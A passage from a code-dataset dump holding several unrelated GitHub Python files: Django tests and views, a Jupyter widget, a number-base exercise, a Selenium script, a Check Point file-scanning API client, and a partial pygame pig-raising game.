objects_creator.create_objects(\n creator=objects_creator.ingredient_creator,\n objects=Data.ingredients\n )\n cls.users = copy.deepcopy(Data.users)\n\n def setUp(self):\n super().setUp()\n\n self.guest_client = APIClient()\n\n\nclass SetAuthUserData(SetDataClass):\n\n def setUp(self):\n super().setUp()\n\n self.auth_client = APIClient()\n self.auth_client_id = 0\n self.auth_client_data = self.users[self.auth_client_id]\n self.auth_client_auth_data = self.get_auth_data(self.auth_client_data)\n\n def get_user_response_data(self, user_id):\n response_data = self.users[user_id].copy()\n\n response_data.pop('password')\n response_data['id'] = user_id + 1\n response_data['is_subscribed'] = False\n\n return response_data\n\n def get_auth_data(self, user_data):\n auth_data = {\n 'email': user_data['email'],\n 'password': user_data['password']\n }\n return auth_data\n\n\nclass SetOneRecipeData(SetAuthUserData):\n\n def setUp(self):\n super().setUp()\n \n self.recipes = copy.deepcopy(Data.recipes)\n \n self.recipe_id = 0\n\n self.guest_client.post('/api/users/', self.auth_client_data)\n authentication(self.auth_client, self.auth_client_auth_data)\n self.author_data = self.get_user_response_data(self.auth_client_id)\n\n def get_recipe_response_data(self, recipe_id, author_response_data):\n response_data = self.recipes[recipe_id].copy()\n\n for ingredient in response_data['ingredients']:\n id = ingredient['id']\n ingredient.update(self.ingredients[id - 1])\n\n response_tags = []\n for tag_id in response_data['tags']:\n response_tags.append(self.tags[tag_id - 1])\n response_data['tags'] = response_tags\n\n response_data['id'] = recipe_id + 1\n response_data['is_favorited'] = False\n response_data['is_in_shopping_cart'] = False\n response_data['author'] = author_response_data\n response_data.pop('image')\n\n return response_data\n\n\nclass SetAllRecipesData(SetOneRecipeData):\n\n def setUp(self):\n super().setUp()\n\n self.second_auth_client = APIClient()\n self.second_auth_client_id = 1\n self.second_auth_client_data = self.users[\n self.second_auth_client_id\n ]\n\n self.second_auth_client_auth_data = (\n self.get_auth_data(self.second_auth_client_data)\n )\n self.guest_client.post('/api/users/', self.second_auth_client_data)\n authentication(\n self.second_auth_client, self.second_auth_client_auth_data\n )\n \n mid = len(self.recipes) // 2\n self.client_post_recipes(\n client=self.auth_client,\n range=range(0, mid),\n author_id=self.auth_client_id\n )\n self.client_post_recipes(\n client=self.second_auth_client,\n range=range(mid, len(self.recipes)),\n author_id=self.second_auth_client_id\n )\n\n def client_post_recipes(self, client, range, author_id):\n for recipe_id in range:\n self.recipes[recipe_id] = self.post_recipe(\n client, self.recipes[recipe_id], recipe_id, author_id\n )\n\n def post_recipe(self, client, recipe, recipe_id, author_id):\n client.post('/api/recipes/', recipe, format='json')\n author_response_data = self.get_user_response_data(author_id)\n recipe = self.get_recipe_response_data(recipe_id, author_response_data)\n return recipe\n","repo_name":"vbifaa/foodgram-project-react","sub_path":"backend/grocery_assistant/grocery_assistant/tests/data/set_data.py","file_name":"set_data.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24848613827","text":"from IPython.display import display, HTML\nimport ipywidgets as widgets\nfrom traitlets import Unicode, validate\nfrom base64 import decodestring\n\nclass FileWidget(widgets.DOMWidget):\n _view_name = Unicode('FileView').tag(sync=True)\n _view_module = Unicode('fileview').tag(sync=True)\n data_url = Unicode('').tag(sync=True)\n\ndisplay(HTML(\"\"))\n\ndef save_data_url(data_url, path):\n\tfile = open(path, \"wb\")\n\tstring = data_url.split(\",\")[1].encode()\n\tfile.write(decodestring(string))\n\tfile.close()\n\ndef changed_data(change):\n\tpath = \"data_url_image.jpg\"\n\tsave_data_url(change.new, path)\n\tprint(\"Saved image to path: {}\".format(path))\n\nfile_widget = FileWidget()\ndisplay(file_widget)\nfile_widget.observe(changed_data, names=[\"data_url\"])","repo_name":"wircho/JupyterWidgets","sub_path":"model_tester.py","file_name":"model_tester.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"33864651792","text":"from builtins import dict\n\nimport Aufgabe3\n\n\ndef ToBinear(zahl):\n listm = []\n print(f'le,{listm}')\n while zahl != 0:\n if (int(zahl) % 2 != 0):\n listm.append(1)\n\n print(f'2,{zahl}')\n if (int(zahl) < 1):\n zahl = 0\n break\n else:\n # print(f'le,{zahl}')\n if (int(zahl) < 1):\n zahl = 0\n break\n listm.append(0)\n\n zahl = int(zahl) / 2\n print(f'0,{zahl}')\n listm.reverse()\n print(f'le,{listm}')\n\n\n#print(ToBinear(127))\nkey = dict({\"0\":0,\"1\": 1, \"2\": 2, \"3\":3, \"4\": 4, \"5\":5\n , \"6\": 6,\n \"7\": 7,\n \"8\": 8,\n \"9\": 9,\n \"A\": 10,\n \"B\": 11,\n \"C\": 12,\n \"D\": 13,\n \"E\": 14,\n \"F\": 15,\n\n })\n\n\ndef HExToDecimal(zahl,true):\n wert=0\n list=[]\n for i in zahl:\n list.append(i)\n lengh = len(list)-1\n for y in list:\n wert+=key[y]*(16**lengh)\n print(f'dsa,{lengh}{key[y]}')\n lengh = lengh - 1\n print(lengh)\n if(true):\n ToBinear(wert)\n\n print(wert)\n\n\nHExToDecimal(\"FC2\",True)","repo_name":"Aref19/MatheAufgabe","sub_path":"Aufgabe4.py","file_name":"Aufgabe4.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16790890923","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom .serializers import ReportSerializer, ReportDetailSerializer, ReportCreateSerializer\nfrom rest_framework.response import Response\nfrom django.db.models import Q\nfrom books.models import Report\nfrom drf_yasg.utils import swagger_auto_schema\n\n@swagger_auto_schema(method='post', request_body=ReportDetailSerializer)\n@api_view(('GET', 'POST'))\ndef report(request, user_id):\n if request.method == 'GET':\n '''\n 독후감 리스트 READ\n\n ---\n '''\n # .get()은 single object = not iterable\n # .filter() 는 QuerySet = iterable\n report_list = Report.objects.filter(user_id = user_id)\n # many = True : queryset이 여러 개의 아이템을 포함하고 있다.(리스트) 를 장고(DRF)에 알려줌\n serializer = ReportDetailSerializer(report_list, many = True)\n\n elif request.method == 'POST':\n '''\n 독후감 CREATE\n\n ---\n '''\n serializer = ReportCreateSerializer(data = request.data)\n # DRF(Django Rest Framework) 에서는 request에서 데이터를 받을 때\n # 반드시 is_valid() 여부를 체크해야 한다.\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status = status.HTTP_201_CREATED)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n return Response(serializer.data, status = status.HTTP_200_OK)\n\n@api_view(('GET', 'PUT', 'DELETE'))\ndef report_detail(request, user_id, book_isbn):\n '''\n 독후감 관련 RUD\n\n ---\n '''\n try:\n report = Report.objects.get(Q(user_id = user_id) & Q(book_isbn = book_isbn))\n except Report.DoesNotExist:\n return Response({\n 'code' : 404,\n 'message' : \"Report not found!\"\n }, status = status.HTTP_404_NOT_FOUND)\n if request.method == 'GET':\n serializer = ReportDetailSerializer(report)\n return Response(serializer.data, status = status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n serializer = ReportCreateSerializer(report, data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n\n elif request.method == 'DELETE':\n report.delete()\n # 삭제한 뒤에는 204 NO CONTENT를 리턴\n return Response(status = status.HTTP_204_NO_CONTENT)\n","repo_name":"sy9612/readme","sub_path":"backend/readme/reports/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"9302339973","text":"a=[12,34,5]\nb=a\nb.remove(5)\nprint(a)\nprint(b)\nprint(a is b)\n\na = input(\"What is your name\")\nif a=='10':\n raise TypeError(\"Numbers are not allowed\")\n\nprint(f\"Hello {a}\")","repo_name":"ShadAhmed122/Public","sub_path":"python practice/v8/Raise and referance.py","file_name":"Raise and referance.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74225453419","text":"#특정 사이트의 텍스트 iframe으로 되어 있는 에디터에 글쓰기\n\nfrom selenium import webdriver\nimport time as tt\nimport random\nfrom datetime import date\nfrom datetime import time\nfrom datetime import datetime\n\n#셋업\ndriver = webdriver.Chrome(\"D:\\selenium\\chromedriver.exe\")\ndriver.set_page_load_timeout(30)\n\n#접속한다.\ndriver.get(\"특정사이트\")\ndriver.implicitly_wait(30)\n\n#입력하기 클릭\ndriver.find_element_by_id(\"Button2\").click()\n\ntt.sleep(3)\n\n#알림창 취소 버튼 누름\nalert = driver.switch_to_alert()\nalert.dismiss()\n\ntt.sleep(3)\n\n\n#에디터 찾아, hello 입력\ndriver.switch_to_frame(0)\ndriver.switch_to_frame(driver.find_element_by_tag_name(\"iframe\"))\ndriver.find_element_by_xpath(\"/html/body\").send_keys(\"hello\")\n\ntt.sleep(3)\t\n\n#종료\ndriver.quit()\n\n\n\n\n","repo_name":"janghyeonan/WEB_Selenium_Python","sub_path":"WEB_Editer_Find_Text_input.py","file_name":"WEB_Editer_Find_Text_input.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40270929835","text":"\"\"\"\nte_api\n A Python client side utility for using Threat Emulation API calls to an appliance.\n You may either set the global variables below (some or all), or assigning their optional\n arguments when running the utility. Run te_api --help for the arguments details.\n\"\"\"\n\nfrom te_file_handler import TE\nimport os\nimport argparse\nimport concurrent.futures\nimport zipfile\n\n# Following variables can be assigned and used instead of adding them as arguments when running the te_api.py .\n# input_directory and reports_directory have the following default settings.\n# Using the following input directory default setting means - assuming that the input files to handle are in\n# already existing folder : ..appliance_tpapi/te_api/input_files\n# Using the following reports_directory default setting means - creating/using the output directory :\n# ..appliance_tpapi/te_api/te_response_data\ninput_directory = \"input_files\"\nreports_directory = \"te_response_data\"\nappliance_ip = \"\"\nbenign_directory = \"\"\nquarantine_directory = \"\"\n\ndef main():\n \"\"\"\n 1. Get the optional arguments (if any): the input-directory, the output-directory and appliance-ip.\n 2. Accordingly set the api-url, and create the output directory.\n 3. Go though all input files in the input directory.\n Handling each input file is described in TE class in te_file_handler.py:\n \"\"\"\n global input_directory\n global reports_directory\n global appliance_ip\n global benign_directory\n global quarantine_directory\n global concurrency\n global url\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-in\", \"--input_directory\", help=\"the input files folder to be scanned by TE\")\n parser.add_argument(\"-rep\", \"--reports_directory\", help=\"the output folder with TE results\")\n parser.add_argument(\"-ip\", \"--appliance_ip\", help=\"the appliance ip address\")\n parser.add_argument('-n', '--concurrency', type=int, help='Number of concurrent loops')\n parser.add_argument('-out', '--benign_directory', help='the directory to move Benign files after scanning')\n parser.add_argument('-jail', '--quarantine_directory', help='the directory to move Malicious files after scanning')\n args = parser.parse_args()\n if args.input_directory:\n input_directory = args.input_directory\n print(\"The input files directory to be scanned by TE : {}\".format(input_directory))\n if not os.path.exists(input_directory):\n print(\"\\n\\n --> The input files directory {} does not exist !\\n\\n\".format(input_directory))\n parser.print_help()\n return\n if args.reports_directory:\n reports_directory = args.reports_directory\n print(\"The output directory with TE results : {}\".format(reports_directory))\n if not os.path.exists(reports_directory):\n print(\"Pre-processing: creating te_api output directory {}\".format(reports_directory))\n try:\n os.mkdir(reports_directory)\n except Exception as E1:\n print(\"could not create te_api output directory, because: {}\".format(E1))\n return\n if args.appliance_ip:\n appliance_ip = args.appliance_ip\n if not appliance_ip:\n print(\"\\n\\n --> Missing appliance_ip !\\n\\n\")\n parser.print_help()\n return\n print(\"The appliance ip address : {}\".format(appliance_ip))\n url = \"https://\" + appliance_ip + \":18194/tecloud/api/v1/file/\"\n if args.benign_directory:\n benign_directory = args.benign_directory\n print(\"The output directory for Benign files: {}\".format(benign_directory))\n if not os.path.exists(benign_directory):\n print(\"Pre-processing: creating Benign directory {}\".format(benign_directory))\n try:\n os.mkdir(benign_directory)\n except Exception as E1:\n print(\"could not create Benign directory because: {}\".format(E1))\n return\n if args.quarantine_directory:\n quarantine_directory = args.quarantine_directory\n print(\"The output directory for Malicious files: {}\".format(quarantine_directory))\n if not os.path.exists(quarantine_directory):\n print(\"Pre-processing: creating Benign directory {}\".format(quarantine_directory))\n try:\n os.mkdir(quarantine_directory)\n except Exception as E1:\n print(\"could not create Quarantine directory because: {}\".format(E1))\n return\n\n\n # Define the list of archive file extensions\n archive_extensions = [\".7z\", \".arj\", \".bz2\", \".CAB\", \".gz\", \".rar\", \".tar\", \".tbz2\", \".tbz\", \".tb2\", \".tgz\", \".xz\", \".zip\", \".udf\", \".qcow2\"]\n\n # A loop over the files in the input folder\n files = os.listdir(input_directory)\n print(\"Begin handling input files by TE\")\n\n # Separate archive files and other files\n archive_files = []\n other_files = []\n\n for file_name in files:\n full_path = os.path.join(input_directory, file_name)\n extension = os.path.splitext(file_name)[1]\n if extension.lower() in archive_extensions:\n archive_files.append(file_name)\n else:\n other_files.append(file_name)\n\n # Process other files concurrently\n with concurrent.futures.ThreadPoolExecutor(max_workers=args.concurrency) as executor:\n executor.map(process_files, other_files)\n\n # Process archive files sequentially\n for file_name in archive_files:\n process_files(file_name)\n\n\ndef process_files(file_name):\n try:\n full_path = os.path.join(input_directory, file_name)\n print(\"Handling file: {} by TE\".format(file_name))\n te = TE(url, file_name, full_path, reports_directory, benign_directory, quarantine_directory)\n te.handle_file()\n except Exception as E:\n print(\"Could not handle file: {} because: {}. Continue to handle the next file.\".format(file_name, E))\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"andynicsgithub/Check-Point-TP-API-scan-utility","sub_path":"te_api.py","file_name":"te_api.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29449942151","text":"import os\nimport rtconfig\nfrom building import *\n\ncwd = GetCurrentDir()\n\npath = [cwd]\n\n# add general drivers\nsrc = Glob('*.c')\n\nsrc += Glob(\"onenet/nb_onenet.c\")\nsrc += Glob(\"onenet/nb_onenet_callback.c\")\npath += [cwd + '/onenet']\n\npath += [cwd + '/tls_configs']\n\ngroup = DefineGroup('ports', src, depend = [''], CPPPATH = path)\n\nReturn('group')\n","repo_name":"lshw/mt2625-rt-thread","sub_path":"ports/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"1599726648","text":"#!/usr/bin/python\n\"\"\"\nMade and produced by Kurced Keyboard Studios, all rights reserved.\nFeel free to edit sound volumes located on lines 66-67.\n\"\"\"\n#Working on:\n#Researching screen and researching itself\n\nimport random,pygame,time,sys,logging\nfrom pygame.locals import *\n#Home brewed libraries:\nfrom wolf import Wolf as WOLF\nfrom pig import Pig as PIG\n\n#library initalizing and whatnot\nSEED = random.randrange(sys.maxsize)\nrandom.seed(SEED)\nlogging.basicConfig(filename='work.log',filemode='w',format='%(name)s @ [%(asctime)s] - %(levelname)s:%(message)s', datefmt='%m/%d/%Y %I:%M %p')\nlogging.root.setLevel(level=logging.DEBUG)\nlogger=logging.getLogger('Butler')\npiglogger = logger.getChild('Pig')\npygame.init()\npygame.mixer.init()\npygame.display.set_caption('Pig')\nflags = pygame.SCALED# | pygame.FULLSCREEN\nGAMESCREEN = pygame.display.set_mode((600,600),flags=flags)\n\nSCREENWIDTH=pygame.display.Info().current_w\nSCREENHEIGHT=pygame.display.Info().current_h\nTPS = 10\nTPSCLOCK = pygame.time.Clock()\nMAPWIDTH = SCREENWIDTH #2000\nMAPHEIGHT = SCREENHEIGHT #2000\n\n#Do a quick debug help:\ndebuglist = {'SCREENDATA':[SCREENWIDTH,SCREENHEIGHT],'MAPDATA':[MAPWIDTH,MAPHEIGHT],'GAMESCREENDATA':GAMESCREEN,'PYGAMEFLAGS':flags}\nlogger.debug('Everything inialized:')\nfor i in debuglist:\n logger.info(str(i)+' - '+str(debuglist[i]))\n\n#Make the background data:\nmapSheet = pygame.image.load('sprites/map/map.png').convert_alpha()\n\nFONTSIZE = 18\n#Colors:\n# R G B\nGRAY = (100, 100, 100)\nNAVYBLUE = ( 0, 0, 150)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nBLUE = ( 0, 0, 255)\nYELLOW = (255, 255, 0)\nORANGE = (255, 128, 0)\nPURPLE = (255, 0, 255)\nCYAN = ( 0, 255, 255)\nBLACK = ( 0, 0, 0)\nDARKGREEN = ( 0, 155, 0)\nDARKGRAY = ( 40, 40, 40)\n\nMAXWOLVES = 3\nWOLFDELAY = 10\nCAMERASLACK = 30\n\nclass TEXT:\n def __init__(self,dict=None,**kwargs):\n if dict != None:\n kwargs = dict\n self.text=kwargs['text']\n self.color = kwargs['color']\n self.size = kwargs['size']\n self.words = pygame.font.Font(\"freesansbold.ttf\",self.size).render(self.text,True,self.color)\n self.rect = self.words.get_rect()\n try:\n self.x = kwargs['leftcords']['x']\n self.y = kwargs['leftcords']['y']\n self.rect.topleft = (self.x,self.y)\n except:\n #The error here is annoying but it checks if there's a leftcords part of kwargs because I frequently position stuff based off the top left corner\n try:\n self.x=kwargs['rightcords']['x']\n self.y=kwargs['rightcords']['y']\n self.rect.topright = (self.x,self.y)\n except:\n self.x = kwargs['x']\n self.y = kwargs['y']\n self.rect.center = (self.x,self.y)\n\n def drawSelf(self):\n self.words = pygame.font.Font(\"freesansbold.ttf\",self.size).render(self.text,True,self.color)\n GAMESCREEN.blit(self.words,self.rect)\n\nclass FOOD(pygame.sprite.Sprite):\n def __init__(self,pig,shop):\n pygame.sprite.Sprite.__init__(self)\n pGap = 50 #Closest the food can be generated to the pig\n bGap = 20 #Closest to the world border the food can generate\n xF = False\n yF = False\n while not xF:\n x = random.randrange(bGap,MAPWIDTH-bGap)\n if (x <= pig.x - pGap or x >= pig.x + pGap) and x > shop.rect.right:\n xF = True\n while not yF:\n y = random.randrange(bGap,MAPHEIGHT-bGap)\n if (y <= pig.y - pGap or y >= pig.y + pGap ) and y > shop.rect.bottom:\n yF = True\n\n self.color = YELLOW\n self.size = 30\n self.cords = (x,y)\n\n originalImage=pygame.image.load('sprites/slop.png').convert_alpha()\n self.image=pygame.transform.scale(originalImage,(self.size,self.size))\n self.rect=self.image.get_rect(center=(self.cords))\n self.mask=pygame.mask.from_surface(self.image)\n self.mask.scale((self.rect.height,self.rect.width))\n\n self.healthGain = 3\n self.weightGain = 3\n self.staminaGain = .5\n def update(self):\n GAMESCREEN.blit(self.image,self.rect)\n\nclass BUTCHERSHOP(pygame.sprite.Sprite):\n def __init__(self):\n rect1 = pygame.Rect(0,0,20,30)\n rect2 = pygame.Rect(mapSheet.get_rect().w/2,0,20,30)\n self.dayimage = pygame.Surface(rect1.size).convert()\n self.nightimage = pygame.Surface(rect2.size).convert()\n self.dayimage.blit(mapSheet,(0,0),rect1)\n #self.nightimage.blit(mapSheet,(0,0),rect2)\n self.dayimage = pygame.transform.scale(self.dayimage,(120,170))\n self.mask = pygame.mask.from_surface(self.dayimage)\n self.rect = self.dayimage.get_rect()\n\nclass BACKGROUND:\n def __init__(self):\n r = mapSheet.get_rect()\n rect1 = pygame.Rect(0,0,r.w/2,r.h)\n rect2 = pygame.Rect(r.w/2,0,r.w/2,r.h)\n self.dayimage = pygame.Surface(rect1.size).convert()\n self.nightimage = pygame.Surface(rect2.size).convert()\n self.dayimage.blit(mapSheet,(0,0),rect1)\n self.nightimage.blit(mapSheet,(0,0),rect2)\n self.dayimage = pygame.transform.scale(self.dayimage,(SCREENWIDTH,SCREENHEIGHT))\n self.nightimage = pygame.transform.scale(self.nightimage,(SCREENWIDTH,SCREENHEIGHT))\n def drawSelf(self,time):\n if time == 'day':\n GAMESCREEN.blit(self.dayimage,(0,0))\n else:\n GAMESCREEN.blit(self.nightimage,(0,0))\n\nclass SYSTEM:\n def __init__(self):\n self.background = BACKGROUND()\n self.butcherShop = BUTCHERSHOP()\n temp = readFile('data/money.txt')\n self.cash = int(float(temp['CASH']))\n self.earnings = 0\n def draw(self,time):\n self.background.drawSelf(time)\n\ndef readFile(file):\n with open(file,'r') as File:\n fileLines = File.readlines()\n for index,i in enumerate(fileLines):\n fileLines[index]=i.replace('\\n','')\n returnData = {}\n for index,i in enumerate(fileLines):\n if index%2 == 0 or index == 0:\n data = fileLines[index+1]\n returnData[i.replace('--','')] = data\n return returnData\n\ndef writeFile(dict,file):\n with open(file,'w') as File:\n for i in dict:\n line = '--'+str(i.upper())+'\\n'\n line2 = str(dict[i])+'\\n'\n File.writelines([line,line2])\n\ndef terminate(pig=None):\n #if pig != None:\n # pig.debug()\n logger.debug('No errors. Exiting game safely')\n logger.info('Seed:'+str(SEED))\n pygame.quit()\n sys.exit()\n\ndef makeWolves(wolfList):\n while len(wolfList) < MAXWOLVES:\n wolfList.add(WOLF(GAMESCREEN,SCREENHEIGHT,SCREENHEIGHT))\n return wolfList\n\ndef makeFood(FoodGroup,pig,systemData):\n #Max food - 5\n while len(FoodGroup) < 5:\n #Generate the actual food objects:\n temp = FOOD(pig,systemData.butcherShop)\n FoodGroup.add(temp)\n return FoodGroup\n\ndef makeCredits(masterList,listToAdd):\n headerColor = ORANGE\n nameColor = CYAN\n headerSize = 40\n nameSize = 40\n headerToNameGap = 30\n nameToHeaderGap = 60\n nameToNameGap = 30\n for index,i in enumerate(listToAdd):\n if index == 0:\n masterList.append(TEXT(text=i,x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+nameToHeaderGap,color=headerColor,size=headerSize))\n elif index == 1:\n masterList.append(TEXT(text=i,x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+headerToNameGap,color=nameColor,size=nameSize))\n else:\n masterList.append(TEXT(text=i,x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+nameToNameGap,color=nameColor,size=nameSize))\n return masterList\n\ndef startScreen(systemData):\n yGap = 30\n optionList = []\n selectedOption = 0\n xGap=20\n yGap=30\n tempList = ['RESEARCH','SETTINGS','QUIT','CREDITS']\n optionList.append(TEXT(text='START GAME',x=SCREENWIDTH/2,y=SCREENHEIGHT/2,color=BLUE,size=FONTSIZE))\n for index,i in enumerate(tempList):\n if index == 0:\n optionList.append(TEXT(text=i,leftcords={'x':xGap,'y':yGap},color=BLUE,size=FONTSIZE))\n else:\n optionList.append(TEXT(text=i,leftcords={'x':xGap,'y':optionList[-1].rect.bottom+yGap},color=BLUE,size=FONTSIZE))\n enter = False\n while not enter:\n systemData.background.drawSelf('night')\n\n for index,i in enumerate(optionList):\n if index == selectedOption:\n i.color = RED\n else:\n i.color = BLUE\n i.drawSelf()\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_RETURN or event.key == K_SPACE:\n enter = not enter\n elif event.key == K_ESCAPE:\n terminate() \n elif event.key == K_TAB or event.key == K_s or event.key == K_DOWN:\n selectedOption += 1\n if selectedOption >= len(optionList):\n selectedOption = 0 \n elif event.key == K_w or event.key == K_UP:\n selectedOption -= 1\n if selectedOption < 0:\n selectedOption = len(optionList)-1\n if optionList[selectedOption].text == 'START GAME':\n game(PIG(FONTSIZE,SCREENWIDTH,SCREENHEIGHT,GAMESCREEN,readFile('data/stats.txt'),piglogger),systemData)\n elif optionList[selectedOption].text == 'QUIT':\n terminate()\n elif optionList[selectedOption].text == 'CREDITS':\n creditsScreen(systemData)\n elif optionList[selectedOption].text == 'RESEARCH':\n researchScreen(systemData)\n #elif optionList[selectedOption].text == 'SETTINGS':\n # settingsScreen(pig)\n\n\"\"\"def settingScreen(pig):\n imageList=[]\n settings = pygame.image.load(\"Images/SettingsButton.png\")\n imageList.append({\"img\":settings,\"cords\":(SCREENWIDTH-30,SCREENHEIGHT-30)})\n start = pygame.image.load(\"Images/StartButton.png\")\n imageList.append({\"img\":start,\"cords\":(SCREENHEIGHT/2,SCREENHEIGHT/2)})\n while True:\n GAMESCREEN.fill(GREEN)\n pig.drawSelf()\n for i in imageList:\n r = i[\"img\"].get_rect()\n r.center = i[\"cords\"]\n GAMESCREEN.blit(i,r)\"\"\"\n\ndef pauseScreen():\n spacer = 20\n paused = TEXT(text=\"PAUSED - \\\"P\\\" TO RETURN\",x=SCREENWIDTH/2,y=SCREENHEIGHT/2,color=RED,size=FONTSIZE)\n quit = TEXT(text=\"QUIT GAME - \\\"Q\\\"\", x=SCREENWIDTH/2,y=paused.rect.bottom + spacer,color=RED,size=FONTSIZE)\n paused.drawSelf()\n quit.drawSelf()\n\ndef midRound(pig,systemData):\n if pig.health <= 0:\n systemData.earnings = 0\n else:\n systemData.earnings += round(pig.weight/(pig.health/pig.speed),2)*5\n\n yGap = 30\n ToDraw = []\n options = []\n ToDraw.append(TEXT(text=('Wallet: '+str(round(systemData.cash,2))+'$'),x=SCREENWIDTH/4,y=SCREENHEIGHT/3,color=BLACK,size=FONTSIZE))\n ToDraw.append(TEXT(text=('Estimated Earnings: '+str(round(float(int(systemData.earnings)),2))+'$'),x=ToDraw[-1].rect.right+(SCREENWIDTH/4),y=SCREENHEIGHT/3,color=BLACK,size=FONTSIZE))\n ToDraw.append(TEXT(text=('Rounds Survived: '+str(pig.age)),x=SCREENWIDTH/2,y=ToDraw[-1].rect.bottom + yGap,color=BLACK,size=FONTSIZE))\n options.append(TEXT(text='CONTINUE',x=SCREENWIDTH/2,y=ToDraw[-1].rect.bottom+yGap,color=BLACK,size=FONTSIZE))\n options.append(TEXT(text='CASH OUT',x=SCREENWIDTH/2,y=options[-1].rect.bottom+yGap,color=BLACK,size=FONTSIZE))\n gameOver = False\n selectedOption = 0\n while True:\n systemData.draw('night')\n\n for index,i in enumerate(options):\n if selectedOption == index:\n i.color = RED\n else:\n i.color = BLACK\n i.drawSelf()\n\n for i in ToDraw:\n i.drawSelf()\n\n TPSCLOCK.tick(TPS)\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate(pig)\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate(pig)\n elif event.key == K_SPACE or event.key == K_RETURN:\n if options[selectedOption].text == 'CONTINUE':\n gameOver = False\n return pig,gameOver,systemData\n else:\n gameOver = True\n systemData.cash += systemData.earnings\n writeFile({'cash':round(systemData.cash,2),'highscore':pig.age},'data/money.txt')\n return pig, gameOver,systemData\n elif event.key == K_TAB or event.key == K_s or event.key == K_DOWN:\n selectedOption += 1\n if selectedOption >= len(options):\n selectedOption = 0\n elif event.key == K_w or event.key == K_UP:\n selectedOption -= 1\n if selectedOption < 0:\n selectedOption = len(options)-1\n\ndef creditsScreen(systemData):\n masterList = []\n scrollSpeed = 3\n headerColor = ORANGE\n headerSize = 40\n headerToNameGap = 30\n localTPS = 40\n\n masterList.append(TEXT(text='CREDITS',x=SCREENWIDTH/2,y=SCREENHEIGHT,color=headerColor,size=headerSize+10))\n masterList.append(TEXT(text='Pig - Kurced Studios',x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+headerToNameGap,color=headerColor,size=headerSize+10)) \n \n masterList = makeCredits(masterList,['DEVELOPERS','Woldorf'])\n masterList = makeCredits(masterList,['CONTRIBUTERS','Woldorf','Quantavious'])\n masterList = makeCredits(masterList,['ARTISTS','Quantavious'])\n masterList = makeCredits(masterList,['ALPHA TESTERS','Woldorf','Quantavious'])\n masterList = makeCredits(masterList,['ESCAPE TO EXIT'])\n \n #Other types of things to display;\n #Special Thanks\n #Donators\n\n while True:\n systemData.draw('night')\n for i in masterList:\n if i == masterList[-1] and masterList[-1].rect.y <= SCREENHEIGHT/2:\n i.rect.y = SCREENHEIGHT/2\n i.rect.y -= scrollSpeed\n i.drawSelf()\n\n TPSCLOCK.tick(localTPS)\n pygame.display.flip()\n\n for i in pygame.event.get():\n if i.type == QUIT:\n terminate()\n elif i.type == KEYDOWN and i.key == K_ESCAPE:\n return\n\ndef game(pig,systemData):\n pig.age += 1 #Basically round count\n FoodGroup = pygame.sprite.Group()\n wolfGroup = pygame.sprite.Group()\n FoodGroup=makeFood(FoodGroup,pig,systemData)\n paused = False\n roundOver = False\n while True:\n systemData.draw('day')\n pig.drawSelf()\n tempList=[]\n for i in pig.drawStats():\n tempList.append(TEXT(dict=i))\n tempList[-1].drawSelf()\n xGap = 5\n rectInflation = 10\n if i['text'] == 'Health:':\n color = BLUE\n if pig.highHealth==pig.MAXHEALTH:\n color = ORANGE\n pygame.draw.rect(GAMESCREEN,RED,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.highHealth*rectInflation,tempList[-1].rect.height))\n pygame.draw.rect(GAMESCREEN,color,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.health*rectInflation,tempList[-1].rect.height))\n elif i['text'] == 'Stamina:':\n color = BLUE\n if pig.highStamina==pig.MAXSTAMINA:\n color = ORANGE\n pygame.draw.rect(GAMESCREEN,RED,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.highStamina*rectInflation,tempList[-1].rect.height))\n pygame.draw.rect(GAMESCREEN,color,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.stamina*rectInflation,tempList[-1].rect.height))\n FoodGroup=makeFood(FoodGroup,pig,systemData)\n FoodGroup.update()\n wolfGroup=makeWolves(wolfGroup)\n wolfGroup.update(GAMESCREEN)\n\n if paused:\n pauseScreen()\n \n TPSCLOCK.tick(TPS)\n pygame.display.flip()\n\n for i in pygame.event.get():\n if i.type == QUIT:\n terminate(pig)\n\n if 